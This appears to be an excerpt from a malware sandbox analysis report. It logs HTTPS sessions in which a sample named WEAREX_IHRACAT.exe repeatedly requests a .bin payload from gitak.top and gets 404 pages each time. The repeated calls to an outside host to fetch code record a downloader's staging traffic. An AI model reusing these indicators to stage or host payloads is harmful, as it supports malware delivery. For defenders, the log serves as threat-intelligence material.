                        CF-RAY: 8babf344da1e57be-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:45:13 UTC | 691 | IN | Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:45:13 UTC | 1369 | IN | Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:45:13 UTC | 913 | IN | Data Ascii: 3 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.
                        2024-08-29 10:45:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        29 | 192.168.11.20 | 49805 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:45:23 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:45:23 UTC | 672 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:45:23 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 116
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d7ML22O2MaLNZwkcKS5ZwIoNBgQdWjIPbpKa5C656H0VcHLsJ3mDbZ9IEolDUb1noMxr2onIbst3OkbdrzkLScnR1NkvZYlF4EIUcwP99DxRYaoQW70ruzdv2pY%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf38668e43937-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:45:23 UTC | 697 | IN | Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:45:23 UTC | 1369 | IN | Data Ascii: argin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}
                        2024-08-29 10:45:23 UTC | 907 | IN | Data Ascii: 15 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0
                        2024-08-29 10:45:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        30 | 192.168.11.20 | 49806 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:45:33 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:45:34 UTC | 676 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:45:34 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 127
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X%2Ft4Tp4q67AjqoGnNYQb3vJ36PjrscP1jipXuXbg4DznR3Hb4YcJ7XJ6OJHXc64pDG09DJPB4mELnEq0%2BEuQhVAsFklDV6mm49lng4PkUvqOGoVLgBwghDiBlnQ%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf3c7ffb620a6-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:45:34 UTC | 693 | IN
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:45:34 UTC | 1369 | IN
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:45:34 UTC | 911 | IN
                        Data Ascii: 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.62
                        2024-08-29 10:45:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        31 | 192.168.11.20 | 49807 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:45:44 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:45:44 UTC | 686 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:45:44 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 137
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I8mdVRsckUPkt8lQImW1t%2FJNUaQlVWdid47Dt%2B8tQOwfS6LRTGKaX6Jf%2Fwwyu%2FhoOWUjgJQazpjxkQtSARQtuY%2BaOgW%2Bdd0lXnN5SPiV%2F4If74pYAqji2H2U9EA%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf4099fdbc964-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:45:44 UTC | 683 | IN
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:45:44 UTC | 1369 | IN
                        Data Ascii: m: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: f
                        2024-08-29 10:45:44 UTC | 921 | IN
                        Data Ascii: 286-2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12
                        2024-08-29 10:45:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        32 | 192.168.11.20 | 49808 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:45:54 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:45:55 UTC | 682 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:45:55 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 148
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CeJDVuF8OdH73QzQxhx6Ya%2By2rTERqsl2K1PkHi6bLgELQ%2FqL6nLvm10nk7D7QPkyypge0Qv2G2NkjWPH%2F8B7rk9Te4lhDOrjOfdWum19e%2FRC%2BdAzDoTfYaziJw%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf44b2cbf7fa2-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:45:55 UTC | 687 | IN
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:45:55 UTC | 1369 | IN
                        Data Ascii: 0px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeI
                        2024-08-29 10:45:55 UTC | 917 | IN
                        Data Ascii: 2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h5
                        2024-08-29 10:45:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        33 | 192.168.11.20 | 49809 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:46:05 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:46:05 UTC | 676 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:46:05 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 158
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E9rZlVeDhwdqDZZGjQhu0dUlwNp5yTVN8CDPGJU6B0zoyrVMK4M2SFsG29iaDHhvENveahuXEZqOdbgnOQVQ2sHWgdBRoqWOO4U3NgF%2Bq5TZHM0nMTlkHxOy%2FqM%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf48cbb7f5b16-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:46:05 UTC | 693 | IN
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:46:05 UTC | 1369 | IN
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:46:05 UTC | 911 | IN
                        Data Ascii: 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.62
                        2024-08-29 10:46:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        34 | 192.168.11.20 | 49810 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:46:15 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:46:16 UTC | 682 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:46:16 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 169
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XpFerUiOo3ZV%2BbxUG8g34luJU5ejspS3NVs3q3CJs2XmEzhBLIZLkq89aryqZdIuxLnwRKNWVBj0ZdMOukG4KD%2FvXYU%2FB4y%2Bz%2FWxC6azEhijd6PBBys1vx21i1o%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf4ce5fc505e2-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:46:16 UTC | 687 | IN
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:46:16 UTC | 1369 | IN
                        Data Ascii: 0px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeI
                        2024-08-29 10:46:16 UTC | 917 | IN
                        Data Ascii: 2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h5
                        2024-08-29 10:46:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        35 | 192.168.11.20 | 49811 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:46:26 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:46:26 UTC | 680 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:46:26 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 179
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CNIMbtOHrHgJlLrjgfSeKe%2FL%2BGXi9zf5%2B4BVoo87xepPBkNa48MR2OZKtRgL2hVw06Eoyk8ByvYbFOoZq%2FZs8XbiuIqUfl5P2iAH2OBG4iNDvsOkUL2ItgjTUsU%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf50feb7f0949-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:46:26 UTC | 689 | IN
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:46:26 UTC | 1369 | IN
                        Data Ascii: x;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:46:26 UTC | 915 | IN
                        Data Ascii: 353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c
                        2024-08-29 10:46:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        36 | 192.168.11.20 | 49812 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:46:36 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:46:37 UTC | 672 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:46:37 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: EXPIRED
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vTE2Sv77XFRjvS8qsqlko1AXrAWneT8Lgnx0krqqZJj%2BallBnvx8eQbG%2B5eDjz4dxLXn7pF1jYX4RbWUL9ZzMDi6nY8h%2FHmfHx3PDDnRzctcZXY5xqeDFxXgX2w%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf5518b0c05c2-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:46:37 UTC | 697 | IN
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:46:37 UTC | 1369 | IN
                        Data Ascii: argin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}
                        2024-08-29 10:46:37 UTC | 907 | IN
                        Data Ascii: 15 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0
                        2024-08-29 10:46:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        37 | 192.168.11.20 | 49813 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:46:47 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:46:47 UTC | 681 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:46:47 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 10
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TMZVqUKXFMvt2oMoa48tTQ6wtJGNlsj%2BV0xfFDSCUlN4MdFfYHKliDJuGvqvQdJspkuekEbN9gYQKsm%2FN%2FCX%2B9QswbCJYmma%2FmsNw34w300XjQjpejXGy4rijac%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf594ad5d801b-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:46:47 UTC | 688 | IN
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:46:47 UTC | 1369 | IN
                        Data Ascii: px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn
                        2024-08-29 10:46:47 UTC | 916 | IN
                        Data Ascii: .353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56
                        2024-08-29 10:46:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        38 | 192.168.11.20 | 49814 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:46:58 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:46:58 UTC | 681 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:46:58 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 21
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2e7n4Gsfk9EOUGZg0NvISoDMYY5slzc%2BuhdL6VsJXvTznTMhPQFig3bIc5SBS0xOp1js7%2BZlr7KJ4ZKaUFT830IKXSxADI5iWUIT%2Bjez%2BQ%2BzACGDLjB0CHTtaDQ%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf5d68da12d28-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:46:58 UTC | 688 | IN
                        Data Ascii: b95<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:46:58 UTC | 1369 | IN
                        Data Ascii: px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn
                        2024-08-29 10:46:58 UTC | 915 | IN
                        Data Ascii: .353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56
                        2024-08-29 10:46:58 UTC | 6 | IN | Data Raw: 31 0d 0a 0a 0d 0a
                        Data Ascii: 1
                        2024-08-29 10:46:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        39 | 192.168.11.20 | 49815 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:47:08 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:47:08 UTC | 683 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:47:08 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 31
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w9E4enV9EQITKn2RdaDLiP1UOL%2F4RcQ3ckHhSfEealRp%2BJr%2Bs6pVErAmRvyglu6UI7uWTGZlJKq6%2Bw%2BC8BIWPeI2PVbnBWrRNkS%2FQk7vcvV4gitiB6PZ9ZnfYyY%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf6182f97061a-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:47:08 UTC | 686 | IN
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:47:08 UTC | 1369 | IN
                        Data Ascii: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fade
                        2024-08-29 10:47:08 UTC | 918 | IN
                        Data Ascii: -2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h
                        2024-08-29 10:47:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        40 | 192.168.11.20 | 49816 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:47:19 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:47:19 UTC | 681 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:47:19 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 42
